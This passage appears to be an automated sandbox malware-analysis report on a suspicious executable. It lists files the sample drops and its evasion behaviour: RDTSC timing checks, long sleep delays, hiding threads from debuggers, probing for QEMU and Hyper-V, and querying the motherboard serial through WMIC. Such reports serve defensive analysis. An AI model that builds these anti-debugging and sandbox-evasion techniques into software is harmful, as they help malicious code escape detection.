Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeRDTSC instruction interceptor: First address: 40A962 second address: 40A962 instructions: 0x00000000 rdtsc 0x00000002 imul eax, eax, 000343FDh 0x00000008 add eax, 00269EC3h 0x0000000d shr eax, 10h 0x00000010 and eax, 00007FFFh 0x00000015 mov ecx, dword ptr [ebp+10h] 0x00000018 test ecx, ecx 0x0000001a jne 00007F8AB86C7227h 0x0000001c sub ecx, dword ptr [ebp+08h] 0x0000001f inc ecx 0x00000020 xor edx, edx 0x00000022 div ecx 0x00000024 add edx, dword ptr [ebp+08h] 0x00000027 mov eax, edx 0x00000029 pop edx 0x0000002a pop ecx 0x0000002b mov esp, ebp 0x0000002d pop ebp 0x0000002e retn 0010h 0x00000031 xor ecx, ecx 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 push eax 0x00000036 cmp ecx, eax 0x00000038 jg 00007F8AB86C73ABh 0x0000003e push 00000001h 0x00000040 push 00000003h 0x00000045 push 00000001h 0x00000047 push 00000001h 0x0000004c call 00007F8AB86C73D1h 0x00000051 push ebp 0x00000052 mov ebp, esp 0x00000054 push ecx 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6CAFE267 rdtsc 7_3_6CAFE267
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeWindow / User API: threadDelayed 2447Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeWindow / User API: threadDelayed 2242Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeWindow / User API: threadDelayed 1376Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeWindow / User API: threadDelayed 992Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeWindow / User API: threadDelayed 552Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zlibwapi.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\concrt140.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\minizip.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeDropped PE file which has not been started: C:\Users\user\Desktop\ExuiKrnln_Win64.libJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeDropped PE file which has not been started: C:\Users\user\Desktop\AntiCheat.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe TID: 7804Thread sleep time: -55500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread sleep count: Count: 1376 delay: -3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,14_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417E47 FindFirstFileW,14_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_0043DCBA FindFirstFileW,FindClose,14_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,14_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10027330 FindFirstFileA,FindClose,14_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_10071280
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,15_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417E47 FindFirstFileW,15_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_0043DCBA FindFirstFileW,FindClose,15_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,15_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100272A0 FindFirstFileA,FindClose,15_2_100272A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10027330 FindFirstFileA,FindClose,15_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10071280
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100357B0 RtlInitializeCriticalSection,GetSystemInfo,14_2_100357B0
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000001AA3000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: \QEMU
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXr2
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C656130 NtSetInformationThread 000000FE,00000011,00000000,000000007_3_6C656130
Hides threads from debuggers
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6CAFE267 rdtsc 7_3_6CAFE267
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C722D2E LdrInitializeThunk,7_3_6C722D2E
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00437770 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00437770
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004404DF GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,14_2_004404DF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumberJump to behavior
